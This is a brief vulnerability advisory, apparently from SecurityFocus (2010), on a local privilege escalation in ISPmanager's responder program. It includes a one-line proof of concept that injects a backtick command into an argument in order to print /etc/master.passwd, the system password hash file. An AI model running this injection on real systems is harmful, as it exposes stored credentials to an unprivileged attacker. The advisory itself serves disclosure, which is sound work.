ISPmanager Responder Local Privilege Escalation Vulnerability

An attacker can manually supply commands to the affected application.

The following proof of concept is available:

/usr/local/ispmgr/sbin/responder /tmp/ '` cat /etc/master.passwd1>&2 `' 2>&1


 

Privacy Statement
Copyright 2010, SecurityFocus